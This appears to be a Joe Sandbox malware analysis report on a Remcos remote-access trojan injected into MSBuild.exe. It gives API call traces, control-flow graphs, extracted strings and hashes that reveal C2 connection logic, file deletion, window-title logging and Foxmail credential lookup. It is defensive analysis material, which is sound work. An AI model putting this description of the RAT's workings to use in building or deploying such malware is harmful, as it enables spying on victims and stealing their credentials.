                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                                                                                                      • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                    • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-L31JDJ$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                    • API String ID: 2830904901-3135556119
                                                                                                                                                                                    • Opcode ID: 7023f23c1536a4d3306a4c76c92aff8fa6d57b024949dbb2b600783d9b8a74de
                                                                                                                                                                                    • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7023f23c1536a4d3306a4c76c92aff8fa6d57b024949dbb2b600783d9b8a74de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 494 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 629 414b54-414b66 call 4047eb call 4020b4 606->629 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a686 607->613 628 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->628 612->629 613->629 694 414434-414441 call 40541d 628->694 695 414446-41446d call 401e8f call 412513 628->695 642 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 629->642 643 414b8e-414b96 call 401d8c 629->643 642->643 643->523 694->695 701 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 695->701 702 41446f-414471 695->702 947 414ac0-414ac7 701->947 702->701 948 414ac9-414ad0 947->948 949 414adb-414ae2 947->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->629
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                    • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-L31JDJ$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                                                                                    • API String ID: 524882891-2308532465
                                                                                                                                                                                    • Opcode ID: 409bbb2ae446932be3b1404bf0bb331e3d7b9f75948c7d855d6209e38680ca6a
                                                                                                                                                                                    • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 409bbb2ae446932be3b1404bf0bb331e3d7b9f75948c7d855d6209e38680ca6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1103 412019-412024 Sleep 1101->1103 1104 41200e-412010 1101->1104 1103->1078 1107 41202a-41203c call 408339 1103->1107 1104->1103 1106 412012-412017 1104->1106 1106->1103 1106->1107 1110 412092-4120b1 call 401e13 * 3 1107->1110 1111 41203e-41204c call 408339 1107->1111 1122 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1122 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1123 41205e-41208a Sleep call 401e13 * 3 1117->1123 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1122->1143 1144 412274-41236b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1122->1144 1123->978 1137 412090 1123->1137 1137->1122 1214 41236f-4123e7 call 401eea call 401e13 call 401eea * 9 1143->1214 1144->1214 1247 4123ec-4123f6 1214->1247
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                      • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                    • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                    • API String ID: 1223786279-3931108886
                                                                                                                                                                                    • Opcode ID: 2ab3fcc47542ab2c48a5214d2ee41a7aa911c151ec8fabfad5ac12eae8f283ab
                                                                                                                                                                                    • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab3fcc47542ab2c48a5214d2ee41a7aa911c151ec8fabfad5ac12eae8f283ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                      • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                      • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                      • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                      • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                    • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                    • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                      • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                      • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                      • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                      • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                      • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                    • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                    • API String ID: 3795512280-3163867910
                                                                                                                                                                                    • Opcode ID: b50194f10b9549b8e57657092ff13f0e4663650bf5b8bf49acf1dd078eeee622
                                                                                                                                                                                    • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b50194f10b9549b8e57657092ff13f0e4663650bf5b8bf49acf1dd078eeee622
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1384 40428c-4042ad connect 1385 4043e1-4043e5 1384->1385 1386 4042b3-4042b6 1384->1386 1389 4043e7-4043f5 WSAGetLastError 1385->1389 1390 40445f 1385->1390 1387 4043da-4043dc 1386->1387 1388 4042bc-4042bf 1386->1388 1391 404461-404465 1387->1391 1392 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1388->1392 1393 4042eb-4042f5 call 420151 1388->1393 1389->1390 1394 4043f7-4043fa 1389->1394 1390->1391 1392->1393 1406 404306-404313 call 420373 1393->1406 1407 4042f7-404301 1393->1407 1396 404439-40443e 1394->1396 1397 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1394->1397 1399 404443-40445c call 401f66 * 2 call 41a686 1396->1399 1397->1390 1399->1390 1416 404315-404338 call 401f66 * 2 call 41a686 1406->1416 1417 40434c-404357 call 420f34 1406->1417 1407->1399 1446 40433b-404347 call 420191 1416->1446 1430 404389-404396 call 4202ea 1417->1430 1431 404359-404387 call 401f66 * 2 call 41a686 call 420592 1417->1431 1443 404398-4043bb call 401f66 * 2 call 41a686 1430->1443 1444 4043be-4043d7 CreateEventW * 2 1430->1444 1431->1446 1443->1444 1444->1387 1446->1390
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • connect.WS2_32(?,00FFB490,00000010), ref: 004042A5
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                                                                                    • Opcode ID: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
                                                                                                                                                                                    • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3658366068-0
                                                                                                                                                                                    • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                                                    • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                    • API String ID: 911427763-3954389425
                                                                                                                                                                                    • Opcode ID: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
                                                                                                                                                                                    • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
